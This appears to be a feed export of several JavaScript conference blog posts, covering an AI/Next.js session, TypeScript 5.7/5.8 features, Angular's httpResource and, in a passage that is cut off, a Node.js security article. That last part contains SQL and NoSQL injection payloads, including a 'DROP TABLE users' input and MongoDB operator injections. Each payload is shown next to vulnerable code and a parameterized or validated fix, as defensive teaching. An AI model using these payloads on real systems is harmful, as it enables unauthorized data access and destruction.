International JavaScript Conference https://javascript-conference.com/ Wed, 09 Jul 2025 16:29:30 +0000 en-US hourly 1 https://wordpress.org/?v=6.7.2 https://javascript-conference.com/wp-content/uploads/2017/03/ijs-favicon-64x64.png International JavaScript Conference https://javascript-conference.com/ 32 32 Watch Session: Build AI-Powered Apps with Next.js – Nir Kaufman https://javascript-conference.com/blog/ai-nextjs-nir-kaufman-workshop/ Wed, 09 Jul 2025 16:26:32 +0000 https://javascript-conference.com/?p=108186 In today’s fast-evolving web development landscape, integrating AI into your apps isn't just a trend—it's becoming a necessity. In this hands-on session, Nir Kaufman walks developers through building AI-driven applications using the Next.js framework. Whether you're exploring generative AI, large language models (LLMs), or building smarter interfaces, this session provides the perfect foundation.

The post Watch Session: Build AI-Powered Apps with Next.js – Nir Kaufman appeared first on International JavaScript Conference.

]]>
The session dives deep into practical ways to incorporate AI into web applications using Next.js, covering everything from LLM fundamentals to real-world coding demos.

1. Understanding AI and Large Language Models (LLMs)

The Session begins with an overview of how AI—especially generative AI models—can enhance modern web applications. Nir explains how LLMs understand and generate content based on user queries, opening the door to intelligent, context-aware features.

2. Integrating AI into Next.js

Participants learn how to connect their Next.js projects with AI APIs, fetching and utilizing model-generated data to enhance app functionality. This includes server-side and client-side integration techniques that ensure seamless performance.

3. Creating Intelligent, Adaptive Interfaces

One key highlight is building UIs that dynamically respond to user behavior. Nir demonstrates how to use AI-generated data to create content and interfaces that feel personalized and highly interactive.

4. Hands-On Coding Examples

Throughout the session, attendees follow along with real-world code samples. From generating UI components based on prompts to managing complex application state with AI logic, each example is designed for immediate application.

5. Best Practices for AI Integration

  • Performance: Use caching and smart data-fetching strategies to avoid bottlenecks.
  • Security: Keep API keys secure and handle user data responsibly.
  • Scalability: Design systems that can scale with increasing AI workloads.

iJS Newsletter

Keep up with JavaScript’s latest news!

Key Takeaways

  • AI enhances—rather than replaces—developer capabilities.
  • Dynamic user experiences are possible with personalized content generation.
  • Efficient state management is crucial in AI-enhanced UIs.
  • Security and privacy must be top priorities when dealing with user data and AI APIs.

Conclusion

This session equips developers with the tools and mindset to begin building powerful, AI-driven web applications using Next.js. Nir Kaufman’s practical approach bridges theory with real-world implementation, making it easier than ever to bring AI into your development stack.

If you’re ready to explore AI-powered features and elevate your web applications, this session is a must-watch. Watch the full video above and start turning your ideas into intelligent applications today.

Watch the full session below:

The post Watch Session: Build AI-Powered Apps with Next.js – Nir Kaufman appeared first on International JavaScript Conference.

]]>
What’s New in TypeScript 5.7/5.8 https://javascript-conference.com/blog/typescript-5-7-5-8-features-ecmascript-direct-execution/ Thu, 26 Jun 2025 12:29:50 +0000 https://javascript-conference.com/?p=108154 TypeScript is widely used today for developing modern web applications because it offers several advantages over a pure JavaScript approach. For example, TypeScript's static type system allows the written program code to be checked for errors during development and build time. This is also known as static code analysis and contributes to the long-term maintainability of the project. The two latest versions, TypeScript 5.7 from November 2024 and 5.8 from March 2025, bring several improvements and new features, which we will explore below.

The post What’s New in TypeScript 5.7/5.8 appeared first on International JavaScript Conference.

]]>
Improved Type Safety

TypeScript improves type safety in several areas. Variables that are never initialized are now detected more reliably. If a variable is declared but never assigned a value, the compiler reports an error. In certain situations, however, this cannot be determined unambiguously for TypeScript. Listing 1 shows such a situation: Within the function definition of “printResult()”, TypeScript cannot clearly determine which path is taken in the outer (separate) function. Therefore, TypeScript makes the “optimistic” assumption that the variable will be initialized.

Listing 1: Optimistic type check in different functional contexts

function foo() {
 let result: number
 if (myCondition()) {
   result = myCalculation();
 } else {
   const temporaryWork = myOtherCalculation();
   // Vergessen, 'result' zuzuweisen
 }
 printResult();
 function printResult() {
   console.log(result); // kein Compiler-Error
 }
}

With version 5.7, this situation has been improved, at least in cases where no conditions are used. In Listing 2, the variable “result” is not assigned, but this is also recognized within the function “printResult()” and now results in a compiler error.

iJS Newsletter

Keep up with JavaScript’s latest news!

Listing 2: Optimistic type check in different functional contexts

function foo() {
 let result: number
 // Weitere Logik, in der keine Zuweisung an 'result' erfolgt

 printResult();
 function printResult() {
   console.log(result); 
 // Variable 'result' is used before being assigned.(2454)
 }
}

Another type check ensures that methods with non-literal (or composite, ‘computed’) property names are consistently treated as index signatures in classes. This is shown in Listing 3 using a method that was created using an index signature.

Listing 3: Index signatures for classes

declare const sym: symbol;
export class MyClass {
 [sym]() { return 1; }
}
// Wird interpretiert als
export class MyClass { [x: symbol]: () => number; }

Previously, this method was ignored by the type system. With 5.7, it now appears as an index signature ([x: symbol] signature). This harmonizes the behavior with object literals and can be particularly useful for generic APIs.

Last but not least, version 5.7 introduces a stricter error message under the “noImplicitAny” compiler option. When this option is enabled, function definitions that do not declare an explicit return type are now checked more thoroughly. Functions without a return type are often arrow functions that are used as callback handlers, for example, in promise chains: “catch(() => null)”. If such handlers implicitly return “null” or “undefined,” the error “TS7011: Function expression, which lacks return-type annotation, implicitly has an ‘any’ return type” is now displayed. The typing is therefore stricter here, so that runtime errors can be better avoided in the future.

Latest ECMAScript and Node.js Support

With TypeScript 5.7, ECMAScript version 2024 can now be used as the compile target (e.g., via compiler flag: –target es2024). This is particularly useful for staying up to date and gaining access to the latest language features and new APIs. New APIs include “Object.groupBy()” and “Map.groupBy()”, which can be used to group an iterable or a map. Listing 4 shows this using an array called “inventory” containing various supermarket products. The array is to be divided into two groups: products that are still available (“sufficient”) and products that need to be restocked (‘restock’). The function “Object.groupBy()” is now passed the array to be grouped and a function that returns which group each item in the array belongs to. The return value of the GroupBy function is an object (here the variable “result”) that contains the different groups as parameters. Each group is again an array (see the console.log outputs in Listing 4). If a group does not contain any entries, the entire group is “undefined.”

Listing 4: Arrays gruppieren mittels Object.groupBy()

const inventory = [
 { name: "asparagus", type: "vegetables", quantity: 9 },
 { name: "bananas", type: "fruit", quantity: 5 },
 { name: "cherries", type: "fruit", quantity: 12 }
];

const result = Object.groupBy(inventory, ({ quantity }) =>
 quantity < 10 ? "restock" : "sufficient",
);

console.log(result.restock);
// [{ name: "asparagus", type: "vegetables", quantity: 9 },
//  { name: "bananas", type: "fruit", quantity: 5 }]

console.log(result.sufficient);
// [{ name: "cherries", type: "fruit", quantity: 12 }]

If more complex calculations are performed, or if WASM, multiple workers, and correspondingly complex setups are used, TypedArray classes (e.g., “Uint8Array”), “ArrayBuffer,” and/or “SharedArrayBuffer” are also frequently used. The length of ArrayBuffers can be changed in ES2024 (‘resize()’), while SharedArrayBuffers can ‘only’ grow (‘grow()’). Therefore, both buffer variants obviously have different APIs. However, the TypedArray classes always use a buffer under the hood. To harmonize the newly created API differences, the common supertype ‘ArrayBufferLike’ is used. If a specific implementation is to be used, the buffer type used can now be specified explicitly, as all TypedArray classes are now generically typed with respect to the underlying buffer types. Listing 5 illustrates this, showing that in the case of “Uint8Array,” “view” can always access the correct buffer variant “SharedArrayBuffer.”

Listing 5: TypedArrays mit generischem Buffer-Typ

// Neu: TypedArray mit generischem ArrayBuffer-Typ
interface Uint8Array<T extends ArrayBufferLike = ArrayBufferLike> { /* ... */ }

// Verwendung mit einem konkreten Typen:
// Hier SharedArrayBuffer
const buffer = new SharedArrayBuffer(16, { maxByteLength: 1024 });
const view = new Uint8Array(buffer);

view.buffer.grow(512); // `grow` exisitiert nur auf SharedArrayBuffer

Directly Executable TypeScript

In addition to the new features, TypeScript also supports libraries that enable TypeScript files to be executed directly without a compile step (e.g., “ts-node,” “tsx,” or Node 23.x with “–experimental-strip-types”). Direct execution of TypeScript can speed up development processes, for example, by skipping the build/compile task between development and execution and “catching up” later. This becomes possible when relative imports are adjusted: Normally, imports do not have a file extension (see Listing 6), so that the imports do not have to differ between the source code and the compiled result. However, executing the file directly without translation requires the “.ts” extension (Listing 6). Such an import usually results in a compiler error. With the new compiler option “–rewriteRelativeImportExtensions,” all TypeScript extensions are automatically rewritten (from .ts.tsx.mts.cts to .js.jsx.mjs.cjs). On the one hand, this provides better support for direct execution. On the other hand, it is also possible to use and compile the TypeScript files in the normal TypeScript build process, which is important, for example, for authors of libraries who want to test their files quickly without a compile step, but also need the real TypeScript build before publishing the library.

EVERYTHING AROUND ANGULAR

Explore the iJS Angular Development Track

Listing 6: Import with .ts extension

import {Demo} from './bar'; //<-Standard-Import
import {Demo} from './bar.ts'; //<-Zum direkten Ausführen nötig

If the Node.js option “–experimental-strip-types” is used to execute TypeScript directly, care must be taken to ensure that only TypeScript constructs that are easy to remove (strip) for Node.js are used. To better support this use case, the new compiler option “–erasableSyntaxOnly” has been added in 5.8. This option prohibits TypeScript-only features such as enums, namespaces, parameter properties (see also Listing 7), and special import forms and marks them as compiler errors.

Listing 7: Constructs prohibited under “–erasableSyntaxOnly”

// error: Namespace mit Runtime-Code
namespace container {
}

class Point {
 // error: Implizite Properties/Parameter-Properties
 constructor(public x: number, public y: number) { }
}

// error: Enum-Deklaration
enum Direction {
 Up,
 Down
}

Further Improvements

The TypeScript team naturally wants to make the development process as pleasant as possible for all developers. To this end, it naturally also uses all the new options available under the hood. In Node.js 22, for example, a caching API (“module.enableCompileCache()”) was introduced, which TypeScript now uses to save recurring parsing and compilation costs. In benchmarks, compiling tsc was about two to three times faster than before.

By default, the compiler checks whether special “@typescript/lib-**” packages are installed. These packages can be used to replace the standard TypeScript libraries in order to customize the behavior of what are actually native TypeScript APIs. The check for such library packages was always performed previously, even if no library packages were used. This can mean unnecessary overhead for many files or in large projects. With the new compiler option “–libReplacement=false*,” this behavior can be disabled, which can improve initialization time, especially in very large projects and monorepos.

Support for developer tools is also an important task for TypeScript. Therefore, there have also been updates to project and editor support. When an editor that uses the TS language server loads a file, it searches for the corresponding “tsconfig.json.” Previously, it stopped at the first match, which often led to the editor assigning the wrong configuration to a file in monorepo-like structures and thus not offering correct developer support. With the new TypeScript versions, the project is now searched further up if necessary to find a suitable configuration. For example, in Listing 8, the test file “foo-test.ts” is now correctly used with the configuration “projekt/src/tsconfig.test.json” and not accidentally with the main configuration “projekt/tsconfig.json”. This makes it easier to work in “workspaces” or composite setups with multiple subprojects.

iJS Newsletter

Keep up with JavaScript’s latest news!

Listing 8: Repo structure with multiple TSConfigs

projekt/
├── src/
│   ├── tsconfig.json
│   ├── tsconfig.test.json
│   ├── foo.ts
│   └── foo-test.ts
└── tsconfig.json

Conclusion

TypeScript 5.7 and 5.8 offer a variety of direct and indirect improvements for developers. In particular, they increase type safety (better errors for uninitialized variables, stricter return checks) and bring the language up to date with ECMAScript. At the same time, they improve the developer experience through faster build processes (compile caching, optimized checks), extended Node.js support, and more flexible configuration for monorepos.

The TypeScript team is already working on many large and small improvements for the future. TypeScript 5.9 is in the starting blocks and is scheduled for release at the end of July. In addition, a major change is planned: the TypeScript runtime is to be completely rewritten in Go for version 7. Initial tests have shown that with the help of the new compiler written in Go, it is possible to achieve up to 10 times faster builds for your own projects.

🔍 Frequently Asked Questions (FAQ)

1. What are the key improvements in TypeScript 5.7?
TypeScript 5.7 brings a host of enhancements, including better type safety, improved management of uninitialized variables, stricter enforcement of return types, and a more consistent approach to recognizing computed property names as index signatures.

2. How does TypeScript 5.8 support direct execution?
With TypeScript 5.8, you can now run .ts files directly using tools like ts-node or Node.js with the –experimental-strip-types flag. New compiler options like –rewriteRelativeImportExtensions and –erasableSyntaxOnly make this process even smoother.

3. What new JavaScript (ECMAScript 2024) features are supported?
TypeScript has added support for ECMAScript 2024 features, including Object.groupBy() and Map.groupBy(), which allow for powerful grouping operations on arrays and maps. It also introduces support for resizable and growable ArrayBuffer and SharedArrayBuffer types.

4. What does the –erasableSyntaxOnly compiler option do?
The –erasableSyntaxOnly option, introduced in TypeScript 5.8, prevents the use of TypeScript-specific constructs like enums, namespaces, and parameter properties in code meant for direct execution, ensuring it works seamlessly with Node.js’s stripping behavior.

5. How has type checking changed for computed method names?
In TypeScript 5.7, methods that use computed (non-literal) property names in classes are now treated as index signatures. This change aligns class behavior more closely with object literals, enhancing consistency for generic and dynamic APIs.

6. What are the benefits of compile caching in newer versions?
TypeScript now takes advantage of Node.js’s compile cache API, which cuts down on unnecessary parsing and compilation. This results in build times that can be 2 to 3 times faster, particularly in larger projects.

7. How does TypeScript handle multiple tsconfig files in monorepos?
In TypeScript 5.8, the compiler and language server have improved support for monorepos by continuing to search parent directories for the most suitable tsconfig.json. This enhancement boosts file association and IntelliSense accuracy in complex workspaces.

The post What’s New in TypeScript 5.7/5.8 appeared first on International JavaScript Conference.

]]>
Exploring httpResource in Angular 19.2 https://javascript-conference.com/blog/exploring-httpresource-angular-19/ Mon, 19 May 2025 11:30:20 +0000 https://javascript-conference.com/?p=107841 Angular 19.2 introduced the experimental httpResource feature, streamlining HTTP data loading within the reactive flow of applications. By leveraging signals, it simplifies asynchronous data fetching, providing developers with a more streamlined approach to handling HTTP requests. With Angular 20 on the horizon, this feature will evolve further, offering even more power for managing data in reactive applications. Let’s explore how to leverage httpResource to enhance your applications.

The post Exploring httpResource in Angular 19.2 appeared first on International JavaScript Conference.

]]>
As an example, we have a simple application that scrolls through levels in the style of the game Super Mario. Each level consists of tiles that are available in four different styles: overworldundergroundunderwater, and castle. In our implementation, users can switch freely between these styles. Figure 1 shows the first level in overworld style, while Figure 2 shows the same level in underground style.

Level 1 in Overworld style

Figure 1: Level 1 in overworld style

Level 1 in the Underground style

Figure 2: Level 1 in the underground style

LevelComponent in the example application takes care of loading level files (JSON) and tiles for drawing the levels using an httpResource. To render and animate the levels, the example relies on a very simple engine that is included with the source code but is treated as a black box here in the article.

HttpClient in the substructure enables the use of interceptors

At its core, the new httpResource currently uses the good old HttpClient. Therefore, the application has to provide this service, which is usually done by calling provideHttpClient during bootstrapping. As a consequence, the httpResource also automatically picks up the registered HttpInterceptors.

However, the HttpClient is just an implementation detail that Angular may eventually replace with a different implementation.

iJS Newsletter

Keep up with JavaScript’s latest news!

Level files

The different levels are described by our example JSON files, which define which tiles are to be displayed at which coordinates (Listing 1).

Listing 1:

{
  "levelId": 1,
  "backgroundColor": "#9494ff",
  "items": [
    { "tileKey": "floor", "col": 0, "row": 13, [...] },
    { "tileKey": "cloud", "col": 12, "row": 1, [...] },
    [...]
  ]
}

These coordinates define positions within a matrix of blocks measuring 16×16 pixels. An overview.json file is provided with these level files, which provides information about the names of the available levels.

LevelLoader takes care of loading these files. To do this, it uses the new httpResource (Listing 2).

Listing 2:

@Injectable({ providedIn: 'root' })
export class LevelLoader {
  getLevelOverviewResource(): HttpResourceRef<LevelOverview> {
    return httpResource<LevelOverview>('/levels/overview.json', {
      defaultValue: initLevelOverview,
    });
  }

  getLevelResource(levelKey: () => string | undefined): HttpResourceRef<Level> {
    return httpResource<Level>(() => !levelKey() ? undefined : `/levels/${levelKey()}.json`, {
      defaultValue: initLevel,
    });
  }

 [...]
}

The first parameter passed to httpResource represents the respective URL. The second optional parameter accepts an object with further options. This object allows the definition of a default value that is used before the resource has been loaded.

The getLevelResource method expects a signal with a levelKey, from which the service derives the name of the desired level file. This read-only signal is an abstraction of the type () => string | undefined.

The URL passed from getLevelResource to httpResource is a lambda expression that the resource automatically reevaluates when the levelKey signal changes. In the background, httpResource uses it to generate a calculated signal that acts as a trigger: every time this trigger changes, the resource loads the URL.

To prevent the httpResource from being triggered, this lambda expression must return the value undefined. This way, the loading can be delayed until the levelKey is available.

Further options with HttpResourceRequest

To get more control over the outgoing HTTP request, the caller can pass an HttpResourceRequest instead of a URL (Listing 3).

Listing 3:

getLevelResource(levelKey: () => string) {
  return httpResource<Level>(
    () => ({
      url: `/levels/${levelKey()}.json`,
      method: "GET",
      headers: {
        accept: "application/json",
      },
      params: {
        levelId: levelKey(),
      },
      reportProgress: false,
      body: null,
      transferCache: false,
      withCredentials: false,
    }),
    { defaultValue: initLevel }
  );
}

This HttpResourceRequest can also be represented by a lambda expression, which the httpResource uses to construct a calculated signal internally.

It is important to note that although the httpResource offers the option to specify HTTP methods (HTTP verbs) beyond GET and a body that is transferred as a payload, it is only intended for retrieving data. These options allow you to integrate web APIs that do not adhere to the semantics of HTTP verbs. By default, the httpResource converts the passed body to JSON.

With the reportProgress option, the caller can request information about the progress of the current operation. This is useful when downloading large files. I will discuss this in more detail below.

Analyzing and validating the received data

By default, the httpResource expects data in the form of JSON that matches the specified type parameter. In addition, a type assertion is used to ensure that TypeScript assumes the presence of correct types. However, it is possible to intervene in this process to provide custom logic for validating the received raw value and converting it to the desired type. To do this, the caller defines a function using the map property in the options object (Listing 4).

Listing 4:

getLevelResourceAlternative(levelKey: () => string) {
  return httpResource<Level>(() => `/levels/${levelKey()}.json`, {
    defaultValue: initLevel,
    map: (raw) => {
      return toLevel(raw);
    },
  });
}

The httpResource converts the received JSON into an object of type unknown and passes it to map. In our example, a simple self-written function toLevel is used. In addition, map also allows the integration of libraries such as Zod, which performs schema validation.

EVERYTHING AROUND ANGULAR

Explore the iJS Angular Development Track

Loading data other than JSON

By default, httpResource expects a JSON document, which it converts into a JavaScript object. However, it also offers other methods that provide other forms of representation:

  • httpResource.text returns text
  • httpResource.blob returns the retrieved data as a blob
  • httpResource.arrayBuffer returns the retrieved data as an ArrayBuffer

To demonstrate the use of these possibilities, the example discussed here requests an image with all possible tiles as a blob. From this blob, it derives the tiles required for the selected level style. Figure 3 shows a section of this tilemap and illustrates that the application can switch between the individual styles by choosing a horizontal or vertical offset.

Section of the tilemap used in the example

Figure 3: Section of the tilemap used in the example (Source)

A TilesMapLoader delegates to httpResource.blob to load the tilemap (Listing 5).

Listing 5:

@Injectable({ providedIn: "root" })
export class TilesMapLoader {
  getTilesMapResource(): HttpResourceRef<Blob | undefined> {
    return httpResource.blob({
      url: "/tiles.png",
      reportProgress: true,
    });
  }
}

This resource also requests progress information and uses the example to display the progress information to the left of the drop-down fields.

Putting it all together: reactive flow

The httpResources described in the last sections can now be combined into the reactive graph of the application (Figure 4).

Reactive flow of ngMario

Figure 4: Reactive flow of ngMario

The signals levelKeystyle, and animation represent the user input. The first two correspond to the drop-down fields at the top of the application. The animation signal contains a Boolean that indicates whether the animation was started by clicking the Toggle Animation button (see screenshots above).

The tilesResource is a classic resource that derives the individual tiles for the selected style from the tilemap. To do this, it essentially delegates to a function of the game engine, which is treated as a black box here.

The rendering is triggered by an effect, especially since we cannot draw the level directly using data binding. It draws or animates the level on a canvas, which the application retrieves as a signal-based viewChild. Angular then calls the effect whenever the level (provided by the levelResource), the style, the animation flag, or the canvas changes.

tilesMapProgress signal uses the progress information provided by tilesMapResource to indicate how much of the tilesmap has already been downloaded. To load the list of available levels, the example uses a levelOverviewResource that is not directly connected to the reactive graph discussed so far.

Listing 6 shows the implementation of this reactive flow in the form of fields of the LevelComponent.

Listing 6:

export class LevelComponent implements OnDestroy {
  private tilesMapLoader = inject(TilesMapLoader);
  private levelLoader = inject(LevelLoader);

  canvas = viewChild<ElementRef<HTMLCanvasElement>>("canvas");

  levelKey = linkedSignal<string | undefined>(() => this.getFirstLevelKey());
  style = signal<Style>("overworld");
  animation = signal(false);

  tilesMapResource = this.tilesMapLoader.getTilesMapResource();
  levelResource = this.levelLoader.getLevelResource(this.levelKey);
  levelOverviewResource = this.levelLoader.getLevelOverviewResource();

  tilesResource = createTilesResource(this.tilesMapResource, this.style);

  tilesMapProgress = computed(() =>
    calcProgress(this.tilesMapResource.progress())
  );

  constructor() {
    [...]
    effect(() => {
      this.render();
    });
  }

  reload() {
    this.tilesMapResource.reload();
    this.levelResource.reload();
  }

  private getFirstLevelKey(): string | undefined {
    return this.levelOverviewResource.value()?.levels?.[0]?.levelKey;
  }

  [...]
}

Using a linkedSignal for the levelKey allows us to use the first level as the default value as soon as the list of levels has been loaded. The getFirstLevelKey helper returns this from the levelOverviewResource.

The effect retrieves the named values from the respective signal and passes them to the engine’s animateLevel or rederLevel function (Listing 7).

Listing 7:

private render() {
  const tiles = this.tilesResource.value();
  const level = this.levelResource.value();
  const canvas = this.canvas()?.nativeElement;
  const animation = this.animation();

  if (!tiles || !canvas) {
    return;
  }

  if (animation) {
    animateLevel({
      canvas,
      level,
      tiles,
    });
  } else {
    renderLevel({
      canvas,
      level,
      tiles,
    });
  }
}

Resources and missing parameters

The tilesResource shown in the diagram discussed is simply delegated to the asynchronous extractTiles function, which the engine also provides (Listing 8).

Listing 8:

function createTilesResource(
  tilesMapResource: HttpResourceRef<Blob | undefined>,
  style: () => Style
) {
  const tilesMap = tilesMapResource.value();

  // undefined prevents the resource from beeing triggered
  const request = computed(() =>
    !tilesMap
      ? undefined
      : {
          tilesMap: tilesMap,
          style: style(),
        }
  );

  return resource({
    request,
    loader: (params) => {
      const { tilesMap, style } = params.request!;
      return extractTiles(tilesMap, style);
    },
  });
}

This simple resource contains an interesting detail: before the tilemap is loaded, the tilesMapResource has the value undefined. However, we cannot call extractTiles without a tilesMap. The request signal takes this into account: it returns undefined if no tilesMap is available yet, so the resource does not trigger its loader.

iJS Newsletter

Keep up with JavaScript’s latest news!

Displaying Progress

The tilesMapResource was configured above to provide information about the download progress via its progress signal. A calculated signal in the LevelComponent projects it into a string for display (Listing 9).

Listing 9:

function calcProgress(progress: HttpProgressEvent | undefined): string {
  if (!progress) {
    return "-";
  }

  if (progress.total) {
    const percent = Math.round((progress.loaded / progress.total) * 100);
    return percent + "%";
  }

  const kb = Math.round(progress.loaded / 1024);
  return kb + " KB";
}

If the server reports the file size, this function calculates a percentage for the portion already downloaded. Otherwise, it just returns the number of kilobytes already downloaded. There is no progress information before the download starts. In this case, only a hyphen is used.

To test this function, it makes sense to throttle the browser’s network connection in the developer console and press the reload button in the application to instruct the resources to reload the data.

Status, header, error, and more

In case the application needs the status code or the headers of the HTTP response, the httpResource provides the corresponding signals:

console.log(this.levelOverviewResource.status());
console.log(this.levelOverviewResource.statusCode());
console.log(this.levelOverviewResource.headers()?.keys());

In addition, the httpResource provides everything that is also known from ordinary resources, including an error signal that provides information about any errors that may have occurred, as well as the option to update the value that is available as a local working copy.

Conclusion

The new httpResource is another building block that complements Angular’s new signal story. It allows data to be loaded within the reactive graph. Currently, it uses the HttpClient as an implementation detail, which may eventually be replaced by another solution at a later date.

While the HTTP resource also allows data to be retrieved using HTTP verbs other than GET, it is not designed to write data back to the server. This task still needs to be done in the conventional way.

The post Exploring httpResource in Angular 19.2 appeared first on International JavaScript Conference.

]]>
Common Vulnerabilities in Node.js Web Applications https://javascript-conference.com/blog/node-js-security-vulnerabilities-sql-xss-prevention/ Wed, 23 Apr 2025 07:44:46 +0000 https://javascript-conference.com/?p=107761 As Node.js is widely used to develop scalable and efficient web applications, understanding its vulnerabilities is crucial. In this article, we will explore common security risks, such as SQL injections and XSS attacks, and offer practical strategies to prevent them. By applying these insights, you'll learn how to protect user data and build more secure and reliable applications.

The post Common Vulnerabilities in Node.js Web Applications appeared first on International JavaScript Conference.

]]>
Node.js Overview

Node.js is an open source cross platform server environment that enables server side JavaScript. It has been in existence for a few years now and has grown to be a favorite among developers when it comes to building scalable and efficient web applications. Node.js is built on Chrome’s V8 JavaScript engine, which provides better speed and performance.

The other important feature of Node.js is its non-blocking, event-driven architecture. This model has enabled Node.js to work well with many concurrent connections and, for this reason, has been applied in real-time applications including chat applications, online gaming, and live streaming. Its use of the familiar JavaScript language also enhances its adoption.

"Diagram illustrating the Node.js system architecture, showing the interaction between the V8 JavaScript engine, Node.js bindings, the Libuv library, event loop, and asynchronous I/O operations including worker threads for file system, network, and process tasks.

Node.js Architecture

The Node.js architecture is designed to optimize performance and efficiency. It employs an event-driven, non-blocking I/O model to efficiently handle many tasks at a time without being slowed down by I/O operations.

Here are the main components of Node.js architecture:

  • Event Loop: The event loop is the heart of Node.js. It’s in charge of coordinating asynchronous I/O operations and preventing the application from becoming unresponsive. Node.js performs an asynchronous operation, such as file read or network request, and registers a callback function; then it carries on executing other code. Once the operation is complete, the callback function is queued up in the event loop, which then calls it.
  • Non-blocking I/O: Node.js uses non-blocking I/O operations so that the application does not become unresponsive when performing time-consuming operations. Node.js does not block the thread and wait for the operation to finish; instead, it carries on executing other code. This makes Node.js able to perform many tasks simultaneously, which is very beneficial.
  • Modules and Packages: Node.js has a large number of modules and packages that can be loaded into an application quite easily. The Node Package Manager (NPM) is currently the largest repository of open source software libraries in the world and is a treasure trove of modules that can help make your application better. However, the use of third-party packages also implies certain risks; if there is a vulnerability in a package, it can be easily exploited by an attacker.

Why Security is Crucial for Node.js Applications

As the usage of Node.js keeps on increasing, so does the need for strong security measures. The security of Node.js applications is important for several reasons:

  • Protecting Sensitive Data: Web applications are likely to deal with sensitive data including personal information, financial information and login credentials. The security of this data has to be secured to prevent unauthorized access and data breaches.
  • Maintaining User Trust: Users expect that their data and activity on an application is secure. A security breach can jeopardize users’ trust and the reputation of the organization.
  • Compliance with Regulations: Many industries are strictly regulated in respect to data security and privacy. It is necessary to make sure that Node.js applications are compliant with such rules in order to avoid legal consequences and financial penalties.
  • Preventing Financial Loss: Security breaches are costly to organizations in terms of dollars and cents. These losses can be in the form of direct costs, such as fines and legal expenses, and indirect costs, including lost revenue and damage to the brand.
  • Mitigating Risks from Third-Party Packages: The use of third-party packages is common in Node.js applications, posing security risks. Flaws in these packages can be exploited by attackers to take over the application. It is crucial to update and scan these packages frequently to reduce these risks.

Common Vulnerabilities in Node.js Applications

Injection Attacks – SQL Injection

Overview: An SQL injection is a type of attack where an attacker can execute malicious SQL statements that control a web application’s database server. This is typically done by inserting or “injecting” malicious SQL code into a query.

Scenario 1: Consider a simple login form where a user inputs their username and password. The server-side code might look something like this:

const username = req.body.username;

const password = req.body.password;

const query = `SELECT * FROM users WHERE username = '${username}' AND password = '${password}'`;

db.query(query, (err, result) => {

  if (err) throw err;

  // Process result

});

If an attacker inputs admin’ — as the username and leaves the password blank, the query becomes:

SELECT * FROM users WHERE username = 'admin' --' AND password = ''

The — sequence comments out the rest of the query, allowing the attacker to bypass authentication.

Solution: To prevent SQL injection, use parameterized queries or prepared statements. This ensures that user input is treated as data, not executable code.

const username = req.body.username;

const password = req.body.password;

const query = 'SELECT * FROM users WHERE username = ? AND password = ?';

db.query(query, [username, password], (err, result) => {

  if (err) throw err;

  // Process result

});

Scenario 2: Consider a simple Express application that retrieves a user from a database:

const express = require('express');

const mysql = require('mysql');

const app = express();

// Database connection

const connection = mysql.createConnection({

  host: 'localhost',

  user: 'root',

  password: 'password',

  database: 'users_db'

});

app.get('/user', (req, res) => {

  const userId = req.query.id;

  

  // VULNERABLE CODE: Direct concatenation of user input

  const query = "SELECT * FROM users WHERE id = " + userId;

  

  connection.query(query, (err, results) => {

    if (err) throw err;

    res.json(results);

  });

});

app.listen(3000);

The Attack

An attacker can exploit this by making a request like:

GET /user?id=1 OR 1=1

The resulting query becomes:

SELECT * FROM users WHERE id = 1 OR 1=1

Since 1=1 is always true, this returns ALL users in the database, exposing sensitive information.

More dangerous attacks might include:

GET /user?id=1; DROP TABLE users; --

Which attemps to delete the entire user’s table.

Secure Solution

Here’s how to fix the vulnerability using parameterized queries:

app.get('/user', (req, res) => {

  const userId = req.query.id;

  

  // SECURE CODE: Using parameterized queries

  const query = "SELECT * FROM users WHERE id = ?";

  

  connection.query(query, [userId], (err, results) => {

    if (err) throw err;

    res.json(results);

  });

});

Best Practices to Prevent SQL Injection

  1. Use Parameterized Queries: Always use parameter placeholders (?) and pass values separately.
  2. ORM Libraries: Consider using ORM libraries like Sequelize or Prisma that handle parameterization automatically.
  3. Input Validation: Validate user input (type, format, length) before using it in queries.
  4. Principle of Least Privilege: Database users should have minimal permissions needed for the application.

EVERYTHING AROUND NODEJS

Explore the iJS Node.js & Backend Track

NoSQL Injection

Overview: NoSQL injection is similar to SQL injection but targets NoSQL databases like MongoDB. Attackers can manipulate queries to execute arbitrary commands.

Scenario 1: Consider a MongoDB query to find a user by username and password:

const username = req.body.username;

const password = req.body.password;

User.findOne({ username: username, password: password }, (err, user) => {

  if (err) throw err;

  // Process user

});

The Attack

If an attacker inputs { “$ne”: “” } as the password, the query becomes:

User.findOne({ username: 'admin', password: { "$ne": "" } }, (err, user) => {

  if (err) throw err;

  // Process user

});

This query returns the first user where the password is not empty, potentially bypassing authentication.

Solution: To prevent NoSQL injection, sanitize user inputs and use libraries like mongo-sanitize to remove any characters that could be used in an injection attack.

const sanitize = require('mongo-sanitize');

const username = sanitize(req.body.username);

const password = sanitize(req.body.password);

User.findOne({ username: username, password: password }, (err, user) => {

  if (err) throw err;

  // Process user

});

Scenario 2: Consider a Node.js application that allows users to search for products with filtering options:

app.post('/products/search', async (req, res) => {

  const { category, sortField } = req.body;

  

  // VULNERABLE CODE: Directly using user input in aggregation pipeline

  const pipeline = [

    { $match: { category: category } },

    { $sort: { [sortField]: 1 } }, // Dangerous!

    { $limit: 20 }

  ];

  

  try {

    const products = await productsCollection.aggregate(pipeline).toArray();

    res.json(products);

  } catch (err) {

    res.status(500).json({ error: err.message });

  }

});

The Attack

An attacker could send a malicious payload:

{

  "category": "electronics",

  "sortField": "$function: { body: function() { return  db.getSiblingDB('admin').auth('admin', 'password') } }"

}

This attempts to execute arbitrary JavaScript in the MongoDB server through the $function operator, potentially allowing database access control bypass or even server-side JavaScript execution.

Secure Solution

Here’s the fixed version:

app.post('/products/search', async (req, res) => {

  const { category, sortField } = req.body;  

  // Validate category

  if (typeof category !== 'string') {

    return res.status(400).json({ error: "Invalid category format" });

  }  

  // Validate sort field against allowlist

  const allowedSortFields = ['name', 'price', 'rating', 'date_added'];

  if (!allowedSortFields.includes(sortField)) {

    return res.status(400).json({ error: "Invalid sort field" });

  }  

  // SECURE CODE: Using validated input

  const pipeline = [

    { $match: { category: category } },

    { $sort: { [sortField]: 1 } },

    { $limit: 20 }

  ]; try {

    const products = await productsCollection.aggregate(pipeline).toArray();

    res.json(products);

  } catch (err) {

    res.status(500).json({ error: "An error occurred" });

  }

});

Key Takeaways:

  1. Validates the data type of the category parameter.
